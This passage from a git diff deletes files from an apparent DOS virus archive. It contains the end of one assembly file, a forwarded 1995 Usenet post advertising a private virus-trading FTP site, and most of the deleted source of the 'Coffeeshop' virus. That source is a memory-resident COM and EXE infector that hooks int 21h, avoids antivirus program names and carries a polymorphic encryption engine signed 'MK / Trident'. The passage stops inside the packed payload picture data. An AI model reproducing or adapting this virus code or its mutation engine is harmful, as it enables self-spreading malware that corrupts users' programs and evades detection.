-;---------------------------------------------------------------------------- - - - - - - - - - - -;-------------------------------- Store Header ----------------------------- - -store_header: - les ax, dword ptr [buffer+14h-100h] ; Save old entry point - mov word ptr [OrigCSIP-100h], ax - mov word ptr [OrigCSIP+2-100h], es - - les ax, dword ptr [buffer+0Eh-100h] ; Save old stack - mov word ptr [OrigSSSP-100h], es - mov word ptr [OrigSSSP+2-100h], ax - - retn - -;--------------------------------------------------------------------------- - - - - - - -;---------------------------------- Set file pointer ------------------------ - -move_f_ptrfar: ; Code to move file pointer. 
- mov ax,4202h - jmp short move_f - -move_f_ptrclose: - mov ax,4200h - -move_f: - xor dx,dx - xor cx,cx - call dosit - retn - -;---------------------------------------------------------------------------- - - -endcode label byte - -endp - -code ends -end start - -From smtp Fri Jan 27 13:23 EST 1995 -Received: from ids.net by POBOX.jwu.edu; Fri, 27 Jan 95 13:23 EST -Date: Fri, 27 Jan 1995 13:21:38 -0500 (EST) -From: ids.net!JOSHUAW (JOSHUAW) -To: pobox.jwu.edu!joshuaw -Content-Length: 1179 -Content-Type: binary -Message-Id: <950127132138.b52b@ids.net> -Status: RO - -To: joshuaw@pobox.jwu.edu -Subject: (fwd) Private Virii FTP Site -Newsgroups: alt.comp.virus - -Path: paperboy.ids.net!uunet!nntp.crl.com!crl12.crl.com!not-for-mail -From: yojimbo@crl.com (Douglas Mauldin) -Newsgroups: alt.comp.virus -Subject: Private Virii FTP Site -Date: 24 Jan 1995 22:01:53 -0800 -Organization: CRL Dialup Internet Access (415) 705-6060 [Login: guest] -Lines: 14 -Message-ID: <3g4pgh$ka2@crl12.crl.com> -NNTP-Posting-Host: crl12.crl.com -X-Newsreader: TIN [version 1.2 PL2] - -I run THe QUaRaNTiNE, a private FTP site for viral reseachers/coders. I'm -always on the lookout for new viral material. If you'd like access, or -like to trade, email me a list of your collection. - -Serious inquiries only. - - -- - -- - - - Yojimbo [] Fast as the Wind - SysOp: The Dojo BBS Quiet as the Forest - 1.7i3.436.1795 Aggressive as Fire - QUaRaNTiNE HomeSite And - THe ULTiMaTE ViRaL InFeCTiON Immovable as a Mountain - - - - - diff --git a/c/COFFSHOP (43).ASM b/c/COFFSHOP (43).ASM deleted file mode 100755 index 323049f..0000000 --- a/c/COFFSHOP (43).ASM +++ /dev/null 
@@ -1,1662 +0,0 @@ - .RADIX 16 - - -_TEXT segment - - assume cs:_TEXT, ds:_TEXT - - -VERSION equ 3 -PICLEN equ last - beeld ;length of picture routine -FILELEN equ last - first ;length of virus -FILEPAR equ (FILELEN + 0F)/10 ;length of virus in paragraphs -VIRPAR equ 00D0 ;space for resident virus -WORKPAR equ 0160 ;work space for engine -STACKOFF equ 1000 ;Stack offset -DATAPAR equ 0050 ;extra memory allocated -BUFLEN equ 1C ;length of buffer - - -;**************************************************************************** -;* data area for virus -;**************************************************************************** - - org 00E0 - -mutstack dw 0, 0 -oldlen dw 0, 0 -oi21 dw 0, 0 -minibuf db 0, 0, 0, 0 - - -;**************************************************************************** -;* data area for engine -;**************************************************************************** - -add_val dw 0 -xor_val dw 0 -xor_offset dw 0 -where_len dw 0 -where_len2 dw 0 -flags db 0 - - -;****************************************************************************** -;* Begin of virus, installation in memory -;****************************************************************************** - - org 0100 - -first: call next ;get IP -next: pop si - - sub si,low 3 ;SI = begin virus - mov di,0100 - cld - - push ax ;save registers - push ds - push es - push di - push si - - mov ah,30 ;DOS version >= 3.1? - int 21 - xchg ah,al - cmp ax,030A - jb not_install - - mov ax,33DA ;already resident? 
- int 21 - cmp ah,0A5 - je not_install - - mov ax,es ;adjust memory-size - dec ax - mov ds,ax - xor bx,bx - cmp byte ptr [bx],5A - jne not_install - mov ax,[bx+3] - sub ax,(VIRPAR+WORKPAR) - jb not_install - mov [bx+3],ax - sub word ptr ds:[bx+12],(VIRPAR+WORKPAR) - - mov es,[bx+12] ;copy program to top - push cs - pop ds - mov cx,FILELEN - rep movsb - - push es - pop ds - - mov ax,3521 ;get original int21 vector - int 21 - mov ds:[oi21],bx - mov ds:[oi21+2],es - - mov dx,offset ni21 ;install new int21 handler - mov ax,2521 - int 21 - - mov ax,33DBh ;init. random nr. generator - int 21 - - mov ah,2A ;ask date - int 21 - cmp al,5 ;friday ? - jne not_install - mov ah,2C ;ask time - int 21 - or dh,dh ;sec = 0 ? - jnz not_install - - mov ax,33DC ;show picture - int 21 - -not_install: pop si ;restore registers - pop di - pop es - pop ds - pop ax - - add si,(offset buffer) - sub si,di - cmp byte ptr cs:[si],4Dh ;COM or EXE ? - je entryE - -entryC: push di - mov cx,BUFLEN - rep movsb - ret - -entryE: mov bx,ds ;calculate CS - add bx,low 10 - mov cx,bx - add bx,cs:[si+0E] - cli ;restore SS and SP - mov ss,bx - mov sp,cs:[si+10] - sti - add cx,cs:[si+16] - push cx ;push new CS on stack - push cs:[si+14] ;push new IP on stack - db 0CBh ;retf - - -;****************************************************************************** -;* Interupt 24 handler -;****************************************************************************** - -ni24: mov al,3 ;to avoid 'Abort, Retry, ...' - iret - - -;****************************************************************************** -;* Interupt 21 handler -;****************************************************************************** - -ni21: pushf - - cmp ax,33DA ;install-check ? - jne not_ic - mov ax,0A500+VERSION ;return a signature - popf - iret - -not_ic: push es ;save registers - push ds - push si - push di - push dx - push cx - push bx - push ax - - cmp ax,33DBh ;rnd init ? 
- jne not_ri - call rnd_init - jmp short no_infect - -not_ri: cmp ax,33DC ;show picture? - je show_pic - -not_pi: cmp ax,4B00 ;execute ? - je do_it - - cmp ax,6C00 ;open DOS 4.0+ ? - jne no_infect - test bl,3 - jnz no_infect - mov dx,di - -do_it: call infect - -no_infect: pop ax ;restore registers - pop bx - pop cx - pop dx - pop di - pop si - pop ds - pop es - popf - -org21: jmp dword ptr cs:[oi21] ;call to old int-handler - - -;****************************************************************************** -;* Show picture -;****************************************************************************** - -show_pic: mov ax,offset no_infect ;push return adres on stack - push cs - push ax - - mov di,((VIRPAR*10)+0100) ;move picture routine - mov si,offset beeld - mov cx,PICLEN - push cs - pop ds - push cs - pop es - rep movsb - - mov ax,cs ;calculate segment registers - add ax,low VIRPAR - mov ds,ax - mov es,ax - - push ax ;push picture adres on stack - mov ax,0100 - push ax - - db 0CBh ;(retf) goto picture routine - - -;****************************************************************************** -;* Tries to infect the file -;****************************************************************************** - -infect: cld - - push cs ;copy filename to CS:0000 - pop es - mov si,dx - xor di,di - mov cx,0080 -namemove: lodsb - cmp al,0 - je moved - cmp al,'a' - jb char_ok - cmp al,'z' - ja char_ok - xor al,20 ;convert to upper case -char_ok: stosb - loop namemove -return0: ret - -moved: stosb ;put last zero after filename - lea si,[di-5] - push cs - pop ds - - lodsw ;check extension .COM or .EXE - cmp ax,'E.' - jne not_exe - lodsw - cmp ax,'EX' - jmp short check - -not_exe: cmp ax,'C.' 
- jne return0 - lodsw - cmp ax,'MO' -check: jne return0 - - std ;find begin of filename - mov cx,si - inc cx -searchbegin: lodsb - cmp al,':' - je checkname - cmp al,'\' - je checkname - loop searchbegin - dec si - -checkname: cld ;check filename - lodsw - lodsw - mov di,offset names - mov cl,13 - repnz scasw - je return0 - - mov ax,3300 ;get ctrl-break flag - int 21 - push dx ;save flag on stack - - cwd ;clear the flag - inc ax - push ax - int 21 - - mov ax,3524 ;get int24 vector - int 21 - push es ;save vector on stack - push bx - - push cs - pop ds - - mov dx,offset ni24 ;install new int24 handler - mov ah,25 - push ax - int 21 - - mov ax,4300 ;ask file-attributes - cwd - int 21 - push cx ;save attributes on stack - - xor cx,cx ;clear attributes - mov ax,4301 - push ax - int 21 - jc return1v - - mov ax,3D02 ;open the file - int 21 - jnc opened -return1v: jmp return1 - -opened: xchg ax,bx ;save handle - - mov ax,5700 ;get file date & time - int 21 - push dx ;save date & time on stack - push cx - - mov cx,BUFLEN ;read begin of file - mov si,offset buffer - mov dx,si - call read - jc closev - - mov ax,4202 ;goto end, get filelength - xor cx,cx - cwd - int 21 - - mov di,offset oldlen ;save filelength - mov [di],ax - mov [di+2],dx - - mov ax,word ptr [si+12] ;already infected? - add al,ah - cmp al,'@' - jz closev - - cmp word ptr [si],'ZM' ;EXE ? - je do_EXE - -do_COM: test byte ptr [si],80 ;maybe a strange EXE? - jz closev - - mov ax,word ptr [di] ;check lenght of file - cmp ah,0D0 - jae closev - cmp ah,1 - jb closev - - mov dx,ax - add dx,0100 - call writeprog ;call Engine and write virus - jne closev - - mov byte ptr [si],0E9 ;put 'JMP xxxx' at begin - sub ax,low 3 - mov word ptr [si+1],ax - jmp done - -closev: jmp close - -do_EXE: cmp word ptr [si+18],40 ;is it a windows/OS2 EXE ? 
- jb not_win - - mov ax,003C - cwd - call readbytes - jc closev - - mov ax,word ptr [di+8] - mov dx,word ptr [di+0A] - call readbytes - jc closev - - cmp byte ptr [di+9],'E' - je closev - -not_win: call getlen - call calclen ;check for internal overlays - cmp word ptr [si+4],ax - jne close - cmp word ptr [si+2],dx - jne close - - cmp word ptr [si+0C],0 ;high memory allocation? - je close - - cmp word ptr [si+1A],0 ;overlay nr. not zero? - jne close - - call getlen ;calculate new CS & IP - mov cx,0010 - div cx - sub ax,word ptr [si+8] - dec ax - add dx,low 10 - - call writeprog ;call Engine and write virus - jne close - - mov word ptr [si+16],ax ;put CS in header - mov word ptr [si+0E],ax ;put SS in header - mov word ptr [si+14],dx ;put IP in header - mov word ptr [si+10],STACKOFF ;put SP in header - - call getlen - add ax,cx - adc dx,0 - call calclen ;put new length in header - mov word ptr [si+4],ax - mov word ptr [si+2],dx - - lea di,[si+0A] ;adjust mem. allocation info - call mem_adjust - lea di,[si+0C] - call mem_adjust - -done: call gotobegin - call rnd_get ;signature - mov ah,'@' - sub ah,al - mov word ptr [si+12],ax - mov cx,BUFLEN ;write new begin - mov dx,si - mov ah,40 - int 21 - -close: pop cx ;restore date & time - pop dx - mov ax,5701 - int 21 - - mov ah,3E ;close the file - int 21 - -return1: pop ax ;restore attributes - pop cx - cwd - int 21 - - pop ax ;restore int24 vector - pop dx - pop ds - int 21 - - pop ax ;restore ctrl-break flag - pop dx - int 21 - - ret - - -;****************************************************************************** -;* Filenames to avoid -;****************************************************************************** - -names: db 'CO', 'SC', 'CL', 'VS', 'NE', 'HT', 'TB', 'VI' - db 'FI', 'GI', 'RA', 'FE', 'MT', 'BR', 'IM', ' ' - db ' ', ' ', ' ' - - -;****************************************************************************** -;* Write virus to the program 
-;****************************************************************************** - -writeprog: push ax ;save registers - push dx - push si - push bp - push es - - cli - mov word ptr [di-4],ss ;save SS & SP - mov word ptr [di-2],sp - - mov ax,cs ;new stack & buffer-segment - mov ss,ax - mov sp,((VIRPAR + WORKPAR) * 10) - add ax,low VIRPAR - mov es,ax - sti - - push ds - - mov bp,dx ;input parameters for engine - mov dx,0100 - mov cx,FILELEN - xor si,si - mov al,0Fh - - push di - push bx - - call crypt ;call the Engine - - pop bx - pop di - - push cx - push dx - mov ax,4202 ;goto end - xor cx,cx - cwd - int 21 - pop dx - pop cx - - mov ah,40 ;write virus - int 21 - cmp ax,cx ;are all bytes written? - - pop ds - - cli - mov ss,word ptr [di-4] ;restore stack - mov sp,word ptr [di-2] - sti - - pop es ;restore registers - pop bp - pop si - pop dx - pop ax - - ret - - -;****************************************************************************** -;* Adjust mem allocation info in EXE header -;****************************************************************************** - -mem_adjust: mov ax,[di] - sub ax,low FILEPAR ;alloc. 
may be this much less - jb more - cmp ax,DATAPAR ;minimum amount to allocate - jae mem_ok -more: mov ax,DATAPAR -mem_ok: mov [di],ax - ret - - -;****************************************************************************** -;* Read a few bytes -;****************************************************************************** - -readbytes: call goto - mov dx,offset minibuf - mov cx,4 -read: mov ah,3F - int 21 - ret - - -;****************************************************************************** -;* Calculate length for EXE header -;****************************************************************************** - -calclen: mov cx,0200 - div cx - or dx,dx - jz no_cor - inc ax -no_cor: ret - - -;****************************************************************************** -;* Get original length of program -;****************************************************************************** - -getlen: mov ax,[di] - mov dx,[di+2] - ret - - -;****************************************************************************** -;* Goto new offset DX:AX -;****************************************************************************** - -gotobegin: xor ax,ax - cwd -goto: xchg cx,dx - xchg ax,dx - mov ax,4200 - int 21 - ret - - -;**************************************************************************** -;* -;* Encryption Engine -;* -;* -;* Input: ES work segment -;* DS:DX code to encrypt -;* BP what will be start of decryptor -;* SI what will be distance between decryptor and code -;* CX length of code -;* AX flags: bit 0: DS will not be equal to CS -;* bit 1: insert random instructions -;* bit 2: put junk before decryptor -;* bit 3: preserve AX with decryptor -;* -;* Output: ES: work segment (preserved) -;* DS:DX decryptor + encrypted code -;* BP what will be start of decryptor (preserved) -;* DI length of decryptor / offset of encrypted code -;* CX length of decryptor + encrypted code -;* AX length of encrypted code -;* (other registers may be trashed) -;* 
-;**************************************************************************** - - db '[ MK / Trident ]' - -crypt: xor di,di ;di = start of decryptor - push dx ;save offset of code - push si ;save future offset of code - - mov byte ptr ds:[flags],al ;save flags - test al,8 ;push AX? - jz no_push - mov al,50 - stosb - -no_push: call rnd_get ;add a few bytes to cx - and ax,1F - add cx,ax - push cx ;save length of code - - call rnd_get ;get random flags - xchg ax,bx - ;BX flags: - - ;0,1 how to encrypt - ;2,3 which register for encryption - ;4 use byte or word for encrypt - ;5 MOV AL, MOV AH or MOV AX - ;6 MOV CL, MOV CH or MOV CX - ;7 AX or DX - - ;8 count up or down - ;9 ADD/SUB/INC/DEC or CMPSW/SCASW - ;A ADD/SUB or INC/DEC - ; CMPSW or SCASW - ;B offset in XOR instruction? - ;C LOOPNZ or LOOP - ; SUB CX or DEC CX - ;D carry with crypt ADD/SUB - ;E carry with inc ADD/SUB - ;F XOR instruction value or AX/DX - -random: call rnd_get ;get random encryption value - or al,al - jz random ;again if 0 - mov ds:[xor_val],ax - - call do_junk ;insert random instructions - - pop cx - - mov ax,0111 ;make flags to remember which - test bl,20 ; MOV instructions are used - jnz z0 - xor al,07 -z0: test bl,0C - jnz z1 - xor al,70 -z1: test bl,40 - jnz z2 - xor ah,7 -z2: test bl,10 - jnz z3 - and al,73 -z3: test bh,80 - jnz z4 - and al,70 - -z4: mov dx,ax -mov_lup: call rnd_get ;put MOV instructions in - and ax,000F ; a random order - cmp al,0A - ja mov_lup - - mov si,ax - push cx ;test if MOV already done - xchg ax,cx - mov ax,1 - shl ax,cl - mov cx,ax - and cx,dx - pop cx - jz mov_lup - xor dx,ax ;remember which MOV done - - push dx - call do_mov ;insert MOV instruction - call do_nop ;insert a random NOP - pop dx - - or dx,dx ;all MOVs done? - jnz mov_lup - - push di ;save start of decryptor loop - - call do_add_ax ;add a value to AX in loop? - call do_nop - test bh,20 ;carry with ADD/SUB ? 
- jz no_clc - mov al,0F8 - stosb -no_clc: mov word ptr ds:[xor_offset],0 - call do_xor ;place all loop instructions - call do_nop - call do_add - - pop dx ;get start of decryptor loop - - call do_loop - - test byte ptr ds:[flags],8 ;insert POP AX ? - jz no_pop - mov al,58 - stosb - -no_pop: xor ax,ax ;calculate loop offset - test bh,1 ;up or down? - jz v1 - mov ax,cx - dec ax - test bl,10 ;encrypt with byte or word? - jz v1 - and al,0FE -v1: add ax,di - add ax,bp - pop si - add ax,si - sub ax,word ptr ds:[xor_offset] - mov si,word ptr ds:[where_len] - test bl,0C ;are BL,BH used for encryption? - jnz v2 - mov byte ptr es:[si],al - mov si,word ptr ds:[where_len2] - mov byte ptr es:[si],ah - jmp short v3 -v2: mov word ptr es:[si],ax - -v3: mov dx,word ptr ds:[xor_val] ;encryption value - - pop si ;ds:si = start of code - - push di ;save ptr to encrypted code - push cx ;save length of encrypted code - - test bl,10 ;byte or word? - jz blup - - inc cx ;cx = # of crypts (words) - shr cx,1 - -lup: lodsw ;encrypt code (words) - call do_encrypt - stosw - loop lup - jmp short klaar - - -blup: lodsb ;encrypt code (bytes) - xor dh,dh - call do_encrypt - stosb - loop blup - -klaar: mov cx,di ;cx = length decryptpr + code - pop ax ;ax = length of decrypted code - pop di ;di = offset encrypted code - xor dx,dx ;ds:dx = decryptor + cr. code - push es - pop ds - ret - - -;**************************************************************************** -;* encrypt the code -;**************************************************************************** - -do_encrypt: add dx,word ptr ds:[add_val] - test bl,2 - jnz lup1 - xor ax,dx - ret - -lup1: test bl,1 - jnz lup2 - sub ax,dx - ret - -lup2: add ax,dx - ret - - -;**************************************************************************** -;* generate mov reg,xxxx -;**************************************************************************** - -do_mov: mov dx,si - mov al,byte ptr ds:[si+mov_byte] - cmp dl,4 ;BX? 
- jne is_not_bx - call add_ind -is_not_bx: test dl,0C ;A*? - pushf - jnz is_not_a - test bl,80 ;A* or D*? - jz is_not_a - add al,2 - -is_not_a: call alter ;insert the MOV - - popf ;A*? - jnz is_not_a2 - mov ax,word ptr ds:[xor_val] - jmp short sss - -is_not_a2: test dl,8 ;B*? - jnz is_not_b - mov si,offset where_len - test dl,2 - jz is_not_bh - add si,2 -is_not_bh: mov word ptr ds:[si],di - jmp short sss - -is_not_b: mov ax,cx ;C* - test bl,10 ;byte or word encryption? - jz sss - inc ax ;only half the number of bytes - shr ax,1 -sss: test dl,3 ;byte or word register? - jz is_x - test dl,2 ;*H? - jz is_not_h - xchg al,ah -is_not_h: stosb - ret - -is_x: stosw - ret - - -;**************************************************************************** -;* insert MOV or alternative for MOV -;**************************************************************************** - -alter: push bx - push cx - push ax - call rnd_get - xchg ax,bx - pop ax - test bl,3 ;use alternative for MOV? - jz no_alter - - push ax - and bx,0F - and al,08 - shl ax,1 - or bx,ax - pop ax - - and al,7 - mov cl,9 - xchg ax,cx - mul cl - - add ax,30C0 - xchg al,ah - test bl,4 - jz no_sub - mov al,28 -no_sub: call maybe_2 - stosw - - mov al,80 - call maybe_2 - stosb - - mov ax,offset add_mode - xchg ax,bx - and ax,3 - xlat - - add al,cl -no_alter: stosb - pop cx - pop bx - ret - - -;**************************************************************************** -;* insert ADD AX,xxxx -;**************************************************************************** - -do_add_ax: push cx - mov si,offset add_val ;save add-value here - mov word ptr ds:[si],0 - mov ax,bx - and ax,8110 - xor ax,8010 - jnz no_add_ax ;use ADD? - - mov ax,bx - xor ah,ah - mov cl,3 - div cl - or ah,ah - jnz no_add_ax ;use ADD? - - test bl,80 - jnz do_81C2 ;AX or DX? 
- mov al,5 - stosb - jmp short do_add0 -do_81C2: mov ax,0C281 - stosw -do_add0: call rnd_get - mov word ptr ds:[si],ax - stosw -no_add_ax: pop cx - ret - - -;**************************************************************************** -;* generate encryption command -;**************************************************************************** - -do_xor: test byte ptr ds:[flags],1 - jz no_cs - mov al,2E ;insert CS: instruction - stosb - -no_cs: test bh,80 ;type of XOR command - jz xor1 - - call get_xor ;encrypt with register - call do_carry - call save_it - xor ax,ax - test bl,80 - jz xxxx - add al,10 -xxxx: call add_dir - test bh,8 - jnz yyyy - stosb - ret - -yyyy: or al,80 - stosb - call rnd_get - stosw - mov word ptr ds:[xor_offset],ax - ret - -xor1: mov al,080 ;encrypt with value - call save_it - call get_xor - call do_carry - call xxxx - mov ax,word ptr ds:[xor_val] - test bl,10 - jmp byte_word - - -;**************************************************************************** -;* generate increase/decrease command -;**************************************************************************** - -do_add: test bl,8 ;no CMPSW/SCASW if BX is used - jz da0 - test bh,2 ;ADD/SUB/INC/DEC or CMPSW/SCASW - jnz do_cmpsw - -da0: test bh,4 ;ADD/SUB or INC/DEC? - jz add1 - - mov al,40 ;INC/DEC - test bh,1 ;up or down? - jz add0 - add al,8 -add0: call add_ind - stosb - test bl,10 ;byte or word? - jz return - stosb ;same instruction again -return: ret - -add1: test bh,40 ;ADD/SUB - jz no_clc2 ;carry? - mov al,0F8 ;insert CLC - stosb -no_clc2: mov al,083 - stosb - mov al,0C0 - test bh,1 ;up or down? - jz add2 - mov al,0E8 -add2: test bh,40 ;carry? - jz no_ac2 - and al,0CF - or al,10 -no_ac2: call add_ind - stosb - mov al,1 ;value to add/sub -save_it: call add_1 - stosb - ret - -do_cmpsw: test bh,1 ;up or down? - jz no_std - mov al,0FDh ;insert STD - stosb -no_std: test bh,4 ;CMPSW or SCASW? 
- jz normal_cmpsw - test bl,4 ;no SCASW if SI is used - jnz do_scasw - -normal_cmpsw: mov al,0A6 ;CMPSB - jmp short save_it -do_scasw: mov al,0AE ;SCASB - jmp short save_it - - -;**************************************************************************** -;* generate loop command -;**************************************************************************** - -do_loop: test bh,1 ;no JNE if couting down - jnz loop_loop ; (prefetch bug!) - call rnd_get - test al,1 ;LOOPNZ/LOOP or JNE? - jnz cx_loop - -loop_loop: mov al,0E0 - test bh,1A ;LOOPNZ or LOOP? - jz ll0 ; no LOOPNZ if xor-offset - add al,2 ; no LOOPNZ if CMPSW/SCASW -ll0: stosb - mov ax,dx - sub ax,di - dec ax - stosb - ret - -cx_loop: test bh,10 ;SUB CX or DEC CX? - jnz cxl_dec - mov ax,0E983 - stosw - mov al,1 - stosb - jmp short do_jne - -cxl_dec: mov al,49 - stosb -do_jne: mov al,75 - jmp short ll0 - - -;**************************************************************************** -;* add value to AL depending on register type -;**************************************************************************** - -add_dir: mov si,offset dir_change - jmp short xx1 - -add_ind: mov si,offset ind_change -xx1: push bx - shr bl,1 - shr bl,1 - and bx,3 - add al,byte ptr ds:[bx+si] - pop bx - ret - - -;**************************************************************************** -;* mov encryption command byte to AL -;**************************************************************************** - -get_xor: push bx - mov ax,offset how_mode - xchg ax,bx - and ax,3 - xlat - pop bx - ret - - -;**************************************************************************** -;* change ADD into ADC -;**************************************************************************** - -do_carry: test bl,2 ;ADD/SUB used for encryption? - jz no_ac - test bh,20 ;carry with (encr.) ADD/SUB? 
- jz no_ac - and al,0CF - or al,10 -no_ac: ret - - -;**************************************************************************** -;* change AL (byte/word) -;**************************************************************************** - -add_1: test bl,10 - jz add_1_ret - inc al -add_1_ret: ret - - -;**************************************************************************** -;* change AL (byte/word) -;**************************************************************************** - -maybe_2: call add_1 - cmp al,81 ;can't touch this - je maybe_not - push ax - call rnd_get - test al,1 - pop ax - jz maybe_not - add al,2 -maybe_not: ret - - -;**************************************************************************** -;* get random nop (or not) -;**************************************************************************** - -do_nop: test byte ptr ds:[flags],2 - jz no_nop -yes_nop: call rnd_get - test al,3 - jz nop8 - test al,2 - jz nop16 - test al,1 - jz nop16x -no_nop: ret - - -;**************************************************************************** -;* Insert random instructions -;**************************************************************************** - -do_junk: test byte ptr ds:[flags],4 - jz no_junk - call rnd_get ;put a random number of - and ax,0F ; dummy instructions before - inc ax ; decryptor - xchg ax,cx -junk_loop: call junk - loop junk_loop -no_junk: ret - - -;**************************************************************************** -;* get rough random nop (may affect register values) -;**************************************************************************** - -junk: call rnd_get - and ax,1E - jmp short aa0 -nop16x: call rnd_get - and ax,06 -aa0: xchg ax,si - call rnd_get - jmp word ptr ds:[si+junkcals] - - -;**************************************************************************** -;* NOP and junk addresses -;**************************************************************************** - -junkcals dw offset nop16x0 - dw offset nop16x1 
- dw offset nop16x2
- dw offset nop16x3
- dw offset nop8
- dw offset nop16
- dw offset junk6
- dw offset junk7
- dw offset junk8
- dw offset junk9
- dw offset junkA
- dw offset junkB
- dw offset junkC
- dw offset junkD
- dw offset junkE
- dw offset junkF
-
-
-;****************************************************************************
-;* NOP and junk routines
-;****************************************************************************
-
-nop16x0: and ax,000F ;J* 0000 (conditional)
- or al,70
- stosw
- ret
-
-
-nop16x1: mov al,0EBh ;JMP xxxx / junk
- and ah,07
- inc ah
- stosw
- xchg al,ah ;get lenght of bullshit
- cbw
- jmp fill_bullshit
-
-
-nop16x2: call junkD ;XCHG AX,reg / XCHG AX,reg
- stosb
- ret
-
-
-nop16x3: call junkF ;INC / DEC or DEC / INC
- xor al,8
- stosb
- ret
-
-
-nop8: push bx ;8-bit NOP
- and al,7
- mov bx,offset nop_data8
- xlat
- stosb
- pop bx
- ret
-
-
-nop16: push bx ;16-bit NOP
- and ax,0303
- mov bx,offset nop_data16
- xlat
- add al,ah
- stosb
- call rnd_get
- and al,7
- mov bl,9
- mul bl
- add al,0C0
- stosb
- pop bx
- ret
-
-
-junk6: push cx ;CALL xxxx / junk / POP reg
- mov al,0E8
- and ah,0F
- inc ah
- stosw
- xor al,al
- stosb
- xchg al,ah
- call fill_bullshit
- call do_nop
- call rnd_get ;insert POP reg
- and al,7
- call no_sp
- mov cx,ax
- or al,58
- stosb
-
- test ch,3 ;more?
- jnz junk6_ret
-
- call do_nop
- mov ax,0F087 ;insert XCHG SI,reg
- or ah,cl
- test ch,8
- jz j6_1
- mov al,8Bh
-j6_1: stosw
-
- call do_nop
- push bx
- call rnd_get
- xchg ax,bx
- and bx,0F7FBh ;insert XOR [SI],xxxx
- or bl,8
- call do_xor
- pop bx
-junk6_ret: pop cx
- ret
-
-
-junk7: and al,0F ;MOV reg,xxxx
- or al,0B0
- call no_sp
- stosb
- test al,8
- pushf
- call rnd_get
- popf
- jmp short byte_word
-
-
-junk8: and ah,39 ;DO r/m,r(8/16)
- or al,0C0
- call no_sp
- xchg al,ah
- stosw
- ret
-
-
-junk9: and al,3Bh ;DO r(8/16),r/m
- or al,2
- and ah,3F
- call no_sp2
- call no_bp
- stosw
- ret
-
-
-junkA: and ah,1 ;DO rm,xxxx
- or ax,80C0
- call no_sp
- xchg al,ah
- stosw
- test al,1
- pushf
- call rnd_get
- popf
- jmp short byte_word
-
-
-junkB: call nop8 ;NOP / LOOP
- mov ax,0FDE2
- stosw
- ret
-
-
-junkC: and al,09 ;CMPS* or SCAS*
- test ah,1
- jz mov_test
- or al,0A6
- stosb
- ret
-mov_test: or al,0A0 ;MOV AX,[xxxx] or TEST AX,xxxx
- stosb
- cmp al,0A8
- pushf
- call rnd_get
- popf
- jmp short byte_word
-
-
-junkD: and al,07 ;XCHG AX,reg
- or al,90
- call no_sp
- stosb
- ret
-
-
-junkE: and ah,07 ;PUSH reg / POP reg
- or ah,50
- mov al,ah
- or ah,08
- stosw
- ret
-
-
-junkF: and al,0F ;INC / DEC
- or al,40
- call no_sp
- stosb
- ret
-
-
-;****************************************************************************
-;* store a byte or a word
-;****************************************************************************
-
-byte_word: jz only_byte
- stosw
- ret
-
-only_byte: stosb
- ret
-
-
-;****************************************************************************
-;* don't fuck with SP!
-;****************************************************************************
-
-no_sp: push ax
- and al,7
- cmp al,4
- pop ax
- jnz no_sp_ret
- and al,0FBh
-no_sp_ret: ret
-
-
-;****************************************************************************
-;* don't fuck with SP!
-;****************************************************************************
-
-no_sp2: push ax
- and ah,38
- cmp ah,20
- pop ax
- jnz no_sp2_ret
- xor ah,20
-no_sp2_ret: ret
-
-
-;****************************************************************************
-;* don't use [BP+..]
-;****************************************************************************
-
-no_bp: test ah,4
- jnz no_bp2
- and ah,0FDh
- ret
-
-no_bp2: push ax
- and ah,7
- cmp ah,6
- pop ax
- jnz no_bp_ret
- or ah,1
-no_bp_ret: ret
-
-
-;****************************************************************************
-;* write byte for JMP/CALL and fill with random bullshit
-;****************************************************************************
-
-fill_bullshit: push cx
- xchg ax,cx
-bull_lup: call rnd_get
- stosb
- loop bull_lup
- pop cx
- ret
-
-
-;****************************************************************************
-;* random number generator (stolen from 'Bomber')
-;****************************************************************************
-
-rnd_init: push cx
- call rnd_init0 ;init
- and ax,000F
- inc ax
- xchg ax,cx
-random_lup: call rnd_get ;call random routine a few
- loop random_lup ; times to 'warm up'
- pop cx
- ret
-
-rnd_init0: push dx ;initialize generator
- push cx
- mov ah,2C
- int 21
- in al,40
- mov ah,al
- in al,40
- xor ax,cx
- xor dx,ax
- jmp short move_rnd
-
-rnd_get: push dx ;calculate a random number
- push cx
- push bx
- mov ax,0 ;will be: mov ax,xxxx
- mov dx,0 ; and mov dx,xxxx
- mov cx,7
-rnd_lup: shl ax,1
- rcl dx,1
- mov bl,al
- xor bl,dh
- jns rnd_l2
- inc al
-rnd_l2: loop rnd_lup
- pop bx
-
-move_rnd: mov word ptr ds:[rnd_get+4],ax
- mov word ptr ds:[rnd_get+7],dx
- mov al,dl
- pop cx
- pop dx
- ret
-
-
-;****************************************************************************
-;* tables for engine
-;****************************************************************************
-
- ; AX AL AH (BX) BL BH CX CL CH
-mov_byte db 0B8, 0B0, 0B4, 0, 0B8,
0B3, 0B7, 0, 0B9, 0B1, 0B5
-
- ; nop clc stc cmc cli cld incbp decbp
-nop_data8 db 90, 0F8, 0F9, 0F5, 0FA, 0FC, 45, 4Dh
-
- ; or and xchg mov
-nop_data16 db 8, 20, 84, 88
-
- ; bl/bh, bx, si di
-dir_change db 07, 07, 04, 05
-ind_change db 03, 03, 06, 07
-
-
- ; xor xor add sub
-how_mode db 30, 30, 00, 28
-
- ; ? add xor or
-add_mode db 0, 0C8, 0F0, 0C0
-
-
-;****************************************************************************
-;* text + buffer
-;****************************************************************************
-
- db ' Amsterdam = COFFEESHOP! '
-
-buffer db 0CDh, 20 ;original code of dummy program
- db (BUFLEN-2) dup (?)
-
-
-;****************************************************************************
-;* the (packed) picture routine
-;****************************************************************************
-
-beeld db 0BFh, 0A1h, 015h, 090h, 090h, 090h, 090h, 090h
- db 090h, 090h, 090h, 0BEh, 0F9h, 003h, 0B9h, 06Bh
- db 001h, 0FDh, 0F3h, 0A5h, 0FCh, 08Bh, 0F7h, 0BFh
- db 000h, 001h, 0ADh, 0ADh, 08Bh, 0E8h, 0B2h, 010h
- db 0E9h, 036h, 014h, 04Fh, 08Fh, 07Fh, 0FCh, 0B4h
- db 00Fh, 0CDh, 010h, 0B4h, 000h, 050h, 0FBh, 0B7h
- db 0B0h, 03Ch, 007h, 074h, 0FFh, 0FFh, 00Ah, 03Ch
- db 004h, 073h, 028h, 0B7h, 0B8h, 03Ch, 002h, 072h
- db 022h, 08Eh, 0C3h, 0BEh, 040h, 001h, 0FFh, 0FFh
- db 0B0h, 019h, 057h, 0B1h, 050h, 0F3h, 0A5h, 05Fh
- db 081h, 0C7h, 0A0h, 000h, 0FEh, 0C8h, 075h, 0F2h
